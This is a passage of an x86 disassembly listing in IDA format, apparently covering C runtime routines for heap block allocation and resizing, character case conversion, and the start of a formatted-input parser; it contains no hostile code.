mov [ebp+arg_0], ebx
jnb short loc_41A047
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41A045
add ebx, 14h
jmp short loc_41A02B
; ---------------------------------------------------------------------------
loc_41A045: ; CODE XREF: sub_419FAD+91�j
cmp ebx, eax
loc_41A047: ; CODE XREF: sub_419FAD+83�j
jnz short loc_41A0A2
loc_41A049: ; CODE XREF: sub_419FAD+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_41A05F
cmp dword ptr [ebx+8], 0
jnz short loc_41A05C
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_41A049
; ---------------------------------------------------------------------------
loc_41A05C: ; CODE XREF: sub_419FAD+A5�j
cmp ebx, [ebp+var_4]
loc_41A05F: ; CODE XREF: sub_419FAD+9F�j
jnz short loc_41A087
mov ebx, edx
loc_41A063: ; CODE XREF: sub_419FAD+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_41A077
cmp dword ptr [ebx+8], 0
jnz short loc_41A075
add ebx, 14h
jmp short loc_41A063
; ---------------------------------------------------------------------------
loc_41A075: ; CODE XREF: sub_419FAD+C1�j
cmp ebx, eax
loc_41A077: ; CODE XREF: sub_419FAD+BB�j
jnz short loc_41A087
call sub_41A2B6
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_41A09B
loc_41A087: ; CODE XREF: sub_419FAD:loc_41A05F�j
; sub_419FAD:loc_41A077�j
push ebx
call sub_41A367
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_41A0A2
loc_41A09B: ; CODE XREF: sub_419FAD+D8�j
xor eax, eax
jmp loc_41A2B1
; ---------------------------------------------------------------------------
loc_41A0A2: ; CODE XREF: sub_419FAD+7A�j
; sub_419FAD:loc_41A047�j ...
mov dword_516EB0, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_41A0C9
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41A100
loc_41A0C9: ; CODE XREF: sub_419FAD+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_41A0FD
loc_41A0E6: ; CODE XREF: sub_419FAD+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_41A0E6
loc_41A0FD: ; CODE XREF: sub_419FAD+137�j
mov edx, [ebp+var_4]
loc_41A100: ; CODE XREF: sub_419FAD+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_41A129
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_41A129: ; CODE XREF: sub_419FAD+16D�j
; sub_419FAD+183�j
test ecx, ecx
jl short loc_41A132
shl ecx, 1
inc edi
jmp short loc_41A129
; ---------------------------------------------------------------------------
loc_41A132: ; CODE XREF: sub_419FAD+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_41A14F
push 3Fh
pop esi
loc_41A14F: ; CODE XREF: sub_419FAD+19D�j
cmp esi, edi
jz loc_41A264
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41A1C0
cmp edi, 20h
jge short loc_41A18F
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_41A1BD
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_41A1C0
; ---------------------------------------------------------------------------
loc_41A18F: ; CODE XREF: sub_419FAD+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_41A1BD
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_41A1C0
; ---------------------------------------------------------------------------
loc_41A1BD: ; CODE XREF: sub_419FAD+1D6�j
; sub_419FAD+203�j
mov ebx, [ebp+arg_0]
loc_41A1C0: ; CODE XREF: sub_419FAD+1B0�j
; sub_419FAD+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_41A270
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41A261
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_41A232
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_41A220
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_41A220: ; CODE XREF: sub_419FAD+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_41A261
; ---------------------------------------------------------------------------
loc_41A232: ; CODE XREF: sub_419FAD+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_41A24B
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_41A24B: ; CODE XREF: sub_419FAD+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_41A261: ; CODE XREF: sub_419FAD+24E�j
; sub_419FAD+283�j
mov ecx, [ebp+var_8]
loc_41A264: ; CODE XREF: sub_419FAD+1A4�j
test ecx, ecx
jz short loc_41A273
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_41A273
; ---------------------------------------------------------------------------
loc_41A270: ; CODE XREF: sub_419FAD+229�j
mov ecx, [ebp+var_8]
loc_41A273: ; CODE XREF: sub_419FAD+2B9�j
; sub_419FAD+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_41A2A9
cmp ebx, dword_516EB4
jnz short loc_41A2A9
mov ecx, [ebp+var_4]
cmp ecx, dword_516EAC
jnz short loc_41A2A9
and dword_516EB4, 0
loc_41A2A9: ; CODE XREF: sub_419FAD+2E0�j
; sub_419FAD+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_41A2B1: ; CODE XREF: sub_419FAD+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_419FAD endp
; =============== S U B R O U T I N E =======================================
sub_41A2B6 proc near ; CODE XREF: sub_419FAD+CC�p
mov eax, dword_516EB8
mov ecx, dword_516EA8
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_41A2F9
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_516EBC
push edi
push dword_516EC0
nop
call near ptr 7C9179FDh
cmp eax, edi
jz short loc_41A349
add dword_516EA8, 10h
mov dword_516EBC, eax
mov eax, dword_516EB8
loc_41A2F9: ; CODE XREF: sub_41A2B6+11�j
mov ecx, dword_516EBC
push 41C4h
push 8
lea eax, [eax+eax*4]
push dword_516EC0
lea esi, [ecx+eax*4]
nop
call near ptr 7C9105D4h
cmp eax, edi
mov [esi+10h], eax
jz short loc_41A349
push 4
push 2000h
push 100000h
push edi
nop
call near ptr 7C809A51h
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_41A34D
push dword ptr [esi+10h]
push edi
push dword_516EC0
nop
call near ptr 7C91043Dh
loc_41A349: ; CODE XREF: sub_41A2B6+30�j
; sub_41A2B6+67�j
xor eax, eax
jmp short loc_41A364
; ---------------------------------------------------------------------------
loc_41A34D: ; CODE XREF: sub_41A2B6+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_516EB8
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_41A364: ; CODE XREF: sub_41A2B6+95�j
pop edi
pop esi
retn
sub_41A2B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A367 proc near ; CODE XREF: sub_419FAD+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_41A379: ; CODE XREF: sub_41A367+19�j
test eax, eax
jl short loc_41A382
shl eax, 1
inc ebx
jmp short loc_41A379
; ---------------------------------------------------------------------------
loc_41A382: ; CODE XREF: sub_41A367+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_41A397: ; CODE XREF: sub_41A367+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_41A397
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
nop
call near ptr 7C809A51h
test eax, eax
jnz short loc_41A3CA
or eax, 0FFFFFFFFh
jmp loc_41A45D
; ---------------------------------------------------------------------------
loc_41A3CA: ; CODE XREF: sub_41A367+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_41A410
lea eax, [edi+10h]
loc_41A3D7: ; CODE XREF: sub_41A367+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_41A3D7
loc_41A410: ; CODE XREF: sub_41A367+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_41A44D
or [eax+4], edi
loc_41A44D: ; CODE XREF: sub_41A367+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_41A45D: ; CODE XREF: sub_41A367+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A367 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A462 proc near ; CODE XREF: sub_418C3F+58�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
mov edx, edi
lea esi, [eax+17h]
sub edx, [ecx+0Ch]
mov eax, [ecx+10h]
and esi, 0FFFFFFF0h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
dec ecx
cmp esi, ecx
mov [ebp+arg_8], ecx
mov ebx, [ecx+edi-4]
lea edi, [ecx+edi-4]
mov [ebp+var_4], ebx
jle loc_41A610
test bl, 1
jnz loc_41A609
add ebx, ecx
cmp esi, ebx
jg loc_41A609
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_41A4D9
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_41A4D9: ; CODE XREF: sub_41A462+6F�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_41A529
cmp ecx, 20h
jnb short loc_41A505
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41A529
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41A529
; ---------------------------------------------------------------------------
loc_41A505: ; CODE XREF: sub_41A462+82�j
add ecx, 0FFFFFFE0h
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41A529
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41A529: ; CODE XREF: sub_41A462+7D�j
; sub_41A462+9A�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_41A5F7
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
lea ecx, [ecx+esi-4]
cmp edi, 3Fh
jbe short loc_41A563
push 3Fh
pop edi
loc_41A563: ; CODE XREF: sub_41A462+FC�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_41A5E5
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_8+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_41A5BC
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41A5AF
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41A5AF: ; CODE XREF: sub_41A462+13D�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, edi
jmp short loc_41A5E1
; ---------------------------------------------------------------------------
loc_41A5BC: ; CODE XREF: sub_41A462+137�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41A5D2
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41A5D2: ; CODE XREF: sub_41A462+15E�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
mov edx, 80000000h
loc_41A5E1: ; CODE XREF: sub_41A462+158�j
shr edx, cl
or [eax], edx
loc_41A5E5: ; CODE XREF: sub_41A462+125�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_41A5FA
; ---------------------------------------------------------------------------
loc_41A5F7: ; CODE XREF: sub_41A462+E5�j
mov edx, [ebp+arg_4]
loc_41A5FA: ; CODE XREF: sub_41A462+193�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_41A750
; ---------------------------------------------------------------------------
loc_41A609: ; CODE XREF: sub_41A462+52�j
; sub_41A462+5C�j
xor eax, eax
jmp loc_41A753
; ---------------------------------------------------------------------------
loc_41A610: ; CODE XREF: sub_41A462+49�j
jge loc_41A750
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
mov [ebp+arg_4], ebx
sar esi, 4
dec esi
mov [ebx-4], ecx
cmp esi, 3Fh
jbe short loc_41A63B
push 3Fh
pop esi
loc_41A63B: ; CODE XREF: sub_41A462+1D4�j
test byte ptr [ebp+var_4], 1
jnz loc_41A6CA
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41A654
push 3Fh
pop esi
loc_41A654: ; CODE XREF: sub_41A462+1ED�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_41A6A3
cmp esi, 20h
jnb short loc_41A67F
mov ebx, 80000000h
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_41A6A0
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41A6A0
; ---------------------------------------------------------------------------
loc_41A67F: ; CODE XREF: sub_41A462+1FD�j
lea ecx, [esi-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41A6A0
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41A6A0: ; CODE XREF: sub_41A462+214�j
; sub_41A462+21B�j ...
mov ebx, [ebp+arg_4]
loc_41A6A3: ; CODE XREF: sub_41A462+1F8�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov ecx, [edi+4]
mov esi, [edi+8]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41A6CA
push 3Fh
pop esi
loc_41A6CA: ; CODE XREF: sub_41A462+1DD�j
; sub_41A462+263�j
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [ebx+4], edi
mov [ebx+8], ecx
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41A747
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [esi+eax+4], cl
jnb short loc_41A71E
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41A711
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_41A711: ; CODE XREF: sub_41A462+29F�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, esi
jmp short loc_41A743
; ---------------------------------------------------------------------------
loc_41A71E: ; CODE XREF: sub_41A462+299�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41A734
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_41A734: ; CODE XREF: sub_41A462+2C0�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
mov edx, 80000000h
loc_41A743: ; CODE XREF: sub_41A462+2BA�j
shr edx, cl
or [eax], edx
loc_41A747: ; CODE XREF: sub_41A462+287�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_41A750: ; CODE XREF: sub_41A462+1A2�j
; sub_41A462:loc_41A610�j
push 1
pop eax
loc_41A753: ; CODE XREF: sub_41A462+1A9�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A462 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A758 proc near ; CODE XREF: sub_417DAD+12B�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_5158EC, 0
push ebx
jnz short loc_41A783
mov eax, [ebp+arg_0]
cmp eax, 61h
jl loc_41A821
cmp eax, 7Ah
jg loc_41A821
sub eax, 20h
jmp loc_41A821
; ---------------------------------------------------------------------------
loc_41A783: ; CODE XREF: sub_41A758+C�j
mov ebx, [ebp+arg_0]
cmp ebx, 100h
jge short loc_41A7B6
cmp dword_43B7AC, 1
jle short loc_41A7A3
push 2
push ebx
call sub_419B4D
pop ecx
pop ecx
jmp short loc_41A7AE
; ---------------------------------------------------------------------------
loc_41A7A3: ; CODE XREF: sub_41A758+3D�j
mov eax, off_43B5A0
mov al, [eax+ebx*2]
and eax, 2
loc_41A7AE: ; CODE XREF: sub_41A758+49�j
test eax, eax
jnz short loc_41A7B6
loc_41A7B2: ; CODE XREF: sub_41A758+AF�j
mov eax, ebx
jmp short loc_41A821
; ---------------------------------------------------------------------------
loc_41A7B6: ; CODE XREF: sub_41A758+34�j
; sub_41A758+58�j
mov edx, off_43B5A0
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_41A7D9
and byte ptr [ebp+arg_0+2], 0
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
push 2
jmp short loc_41A7E2
; ---------------------------------------------------------------------------
loc_41A7D9: ; CODE XREF: sub_41A758+71�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
push 1
loc_41A7E2: ; CODE XREF: sub_41A758+7F�j
pop eax
lea ecx, [ebp+var_4]
push 1
push 0
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 200h
push dword_5158EC
call sub_41BC2B
add esp, 20h
test eax, eax
jz short loc_41A7B2
cmp eax, 1
jnz short loc_41A814
movzx eax, [ebp+var_4]
jmp short loc_41A821
; ---------------------------------------------------------------------------
loc_41A814: ; CODE XREF: sub_41A758+B4�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_41A821: ; CODE XREF: sub_41A758+14�j
; sub_41A758+1D�j ...
pop ebx
leave
retn
sub_41A758 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A824 proc near ; CODE XREF: sub_417FCC+2A�p
var_1C4 = byte ptr -1C4h
var_1C3 = byte ptr -1C3h
var_64 = byte ptr -64h
var_59 = byte ptr -59h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_35 = byte ptr -35h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C4h
and [ebp+var_15], 0
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
push edi
mov al, [esi]
mov [ebp+var_4], ebx
test al, al
mov [ebp+var_34], ebx
jz loc_41B22A
mov edi, [ebp+arg_0]
jmp short loc_41A853
; ---------------------------------------------------------------------------
loc_41A84E: ; CODE XREF: sub_41A824+9CE�j
mov edi, [ebp+arg_0]
xor ebx, ebx
loc_41A853: ; CODE XREF: sub_41A824+28�j
cmp dword_43B7AC, 1
jle short loc_41A86B
movzx eax, al
push 8
push eax
call sub_419B4D
pop ecx
pop ecx
jmp short loc_41A87A
; ---------------------------------------------------------------------------
loc_41A86B: ; CODE XREF: sub_41A824+36�j
mov ecx, off_43B5A0
movzx eax, al
mov al, [ecx+eax*2]
and eax, 8
loc_41A87A: ; CODE XREF: sub_41A824+45�j
cmp eax, ebx
jz short loc_41A8B4
dec [ebp+var_4]
push edi
lea eax, [ebp+var_4]
push edi
push eax
call sub_41B2B1
pop ecx
pop ecx
push eax
call sub_41B29A
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_41DC3D
add esp, 0Ch
loc_41A8A2: ; CODE XREF: sub_41A824+8E�j
test eax, eax
jz short loc_41A8B4
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_41DC3D
pop ecx
jmp short loc_41A8A2
; ---------------------------------------------------------------------------
loc_41A8B4: ; CODE XREF: sub_41A824+58�j
; sub_41A824+80�j
cmp byte ptr [esi], 25h
jnz loc_41B196
and [ebp+var_35], 0
and [ebp+var_18], 0
and [ebp+var_17], 0
and [ebp+var_E], 0
and [ebp+var_F], 0
and [ebp+var_16], 0
xor edi, edi
and [ebp+var_5], 0
mov [ebp+var_1C], ebx
mov [ebp+var_20], ebx
mov [ebp+var_C], ebx
mov [ebp+var_D], 1
mov [ebp+var_30], ebx
loc_41A8EB: ; CODE XREF: sub_41A824+172�j
movzx ebx, byte ptr [esi+1]
inc esi
cmp dword_43B7AC, 1
jle short loc_41A908
movzx eax, bl
push 4
push eax
call sub_419B4D
pop ecx
pop ecx
jmp short loc_41A917
; ---------------------------------------------------------------------------
loc_41A908: ; CODE XREF: sub_41A824+D3�j
mov ecx, off_43B5A0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_41A917: ; CODE XREF: sub_41A824+E2�j
test eax, eax
jz short loc_41A92D
mov eax, [ebp+var_C]
inc [ebp+var_20]
lea eax, [eax+eax*4]
lea eax, [ebx+eax*2-30h]
mov [ebp+var_C], eax
jmp short loc_41A992
; ---------------------------------------------------------------------------
loc_41A92D: ; CODE XREF: sub_41A824+F5�j
cmp ebx, 4Eh
jg short loc_41A970
jz short loc_41A992
cmp ebx, 2Ah
jz short loc_41A96B
cmp ebx, 46h
jz short loc_41A992
cmp ebx, 49h
jz short loc_41A94D
cmp ebx, 4Ch
jnz short loc_41A97F
inc [ebp+var_D]
jmp short loc_41A992
; ---------------------------------------------------------------------------
loc_41A94D: ; CODE XREF: sub_41A824+11D�j
cmp byte ptr [esi+1], 36h
jnz short loc_41A97F
cmp byte ptr [esi+2], 34h
lea eax, [esi+2]
jnz short loc_41A97F
inc [ebp+var_30]
and [ebp+var_28], 0
and [ebp+var_24], 0
mov esi, eax
jmp short loc_41A992
; ---------------------------------------------------------------------------
loc_41A96B: ; CODE XREF: sub_41A824+113�j
inc [ebp+var_E]
jmp short loc_41A992
; ---------------------------------------------------------------------------
loc_41A970: ; CODE XREF: sub_41A824+10C�j
cmp ebx, 68h
jz short loc_41A98C
cmp ebx, 6Ch
jz short loc_41A984
cmp ebx, 77h
jz short loc_41A987
loc_41A97F: ; CODE XREF: sub_41A824+122�j
; sub_41A824+12D�j ...
inc [ebp+var_F]
jmp short loc_41A992
; ---------------------------------------------------------------------------
loc_41A984: ; CODE XREF: sub_41A824+154�j
inc [ebp+var_D]
loc_41A987: ; CODE XREF: sub_41A824+159�j
inc [ebp+var_5]
jmp short loc_41A992
; ---------------------------------------------------------------------------
loc_41A98C: ; CODE XREF: sub_41A824+14F�j
dec [ebp+var_D]
dec [ebp+var_5]
loc_41A992: ; CODE XREF: sub_41A824+107�j
; sub_41A824+10E�j ...
cmp [ebp+var_F], 0
jz loc_41A8EB
cmp [ebp+var_E], 0
mov [ebp+arg_4], esi
jnz short loc_41A9B7
mov eax, [ebp+arg_8]
mov [ebp+var_44], eax
add eax, 4
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_2C], eax
loc_41A9B7: ; CODE XREF: sub_41A824+17F�j
and [ebp+var_F], 0
cmp [ebp+var_5], 0
jnz short loc_41A9D5
mov al, [esi]
cmp al, 53h
jz short loc_41A9D1
cmp al, 43h
jz short loc_41A9D1
or [ebp+var_5], 0FFh
jmp short loc_41A9D5
; ---------------------------------------------------------------------------
loc_41A9D1: ; CODE XREF: sub_41A824+1A1�j
; sub_41A824+1A5�j
mov [ebp+var_5], 1
loc_41A9D5: ; CODE XREF: sub_41A824+19B�j
; sub_41A824+1AB�j
mov ebx, [ebp+arg_4]
movzx esi, byte ptr [ebx]
or esi, 20h
cmp esi, 6Eh
mov [ebp+var_3C], esi
jz short loc_41AA0E
cmp esi, 63h
jz short loc_41A9FF
cmp esi, 7Bh
jz short loc_41A9FF
push [ebp+arg_0]
lea eax, [ebp+var_4]
push eax
call sub_41B2B1
pop ecx
jmp short loc_41AA0A
; ---------------------------------------------------------------------------
loc_41A9FF: ; CODE XREF: sub_41A824+1C5�j
; sub_41A824+1CA�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_41B280
loc_41AA0A: ; CODE XREF: sub_41A824+1D9�j
pop ecx
mov [ebp+var_14], eax
loc_41AA0E: ; CODE XREF: sub_41A824+1C0�j
xor eax, eax
cmp [ebp+var_20], eax
jz short loc_41AA1E
cmp [ebp+var_C], eax
jz loc_41B1FA
loc_41AA1E: ; CODE XREF: sub_41A824+1EF�j
cmp esi, 6Fh
jg loc_41AC85
jz loc_41AF37
cmp esi, 63h
jz loc_41AC62
